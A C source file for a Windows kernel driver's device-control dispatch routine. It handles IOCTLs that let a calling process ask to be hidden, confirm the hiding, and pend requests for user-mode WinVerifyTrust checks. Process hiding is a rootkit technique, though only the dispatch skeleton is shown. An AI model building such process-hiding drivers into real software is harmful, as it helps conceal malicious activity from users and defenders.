#include "MJDeviceControl.h"

NTSTATUS
TestDriverDeviceControl(
	PDEVICE_OBJECT pDeviceObject, 
	PIRP pIrp
	)
/*++
Routine Description:

    This routine handle the various IOCTL

Arguments:

    DeviceObject - our driver device object.

    pIrp - pointer to the irp associated with this dispatch

Return Value:

    STATUS_SUCCESS if successful

--*/
{
	NTSTATUS status = STATUS_SUCCESS;
	PIO_STACK_LOCATION pIoStack = IoGetCurrentIrpStackLocation(pIrp);

	switch(pIoStack->Parameters.DeviceIoControl.IoControlCode)
	{
	case IOCTL_TESTDRIVER_HIDE_PROCESS:
		//
		//we use PsGetCurrentProcess to get the ptr to the calling process EPROCESS
		//
		if(!RequestHideProcess(PsGetCurrentProcess(),pIrp)) status = STATUS_NOT_SUPPORTED;
		else status = STATUS_PENDING;

		DbgPrint("TestDriver - TestDriverDeviceControl() - Found Eprocess at 0x%p\n",
			PsGetCurrentProcess()
			);

		break;
	case IOCTL_TESTDRIVER_HIDE_PROCESS_ACK:
		//
		//we try to confirm process hiding
		//
		if(!ConfirmHideProcess(pIrp)) status = STATUS_NOT_SUPPORTED;
		else status = STATUS_SUCCESS;

		DbgPrint("TestDriver - TestDriverDeviceControl() - Received Ack\n");

		break;
	case IOCTL_TESTDRIVER_PENDING_USERMODE_REQUEST:
		//
		//We pend the IRP so when we need to check WinVerifyTrust from usermode we simply complete it
		//
		if(!WinVerifyTrustPendIrp(pIrp))
		{
			DbgPrint("TestDriver - TestDriverDeviceControl() - Cannot pend Irp\n");

			status = STATUS_NOT_SUPPORTED;
		}
		else {

			DbgPrint("TestDriver - TestDriverDeviceControl() - Irp pended\n");

			status = STATUS_PENDING;
		}

		break;
	default:
		status = STATUS_NOT_SUPPORTED;

		DbgPrint("TestDriver - TestDriverDeviceControl() - Received unknown code 0x%08X\n",
			pIoStack->Parameters.DeviceIoControl.IoControlCode
			);

		break;
	}

	if(status != STATUS_PENDING) {
		DbgPrint("TestDriver - TestDriverDeviceControl() - Completing IRP\n");
		pIrp->IoStatus.Status = status;
		pIrp->IoStatus.Information = 0;
		IoCompleteRequest(pIrp, IO_NO_INCREMENT);
	}

	return(status);
}

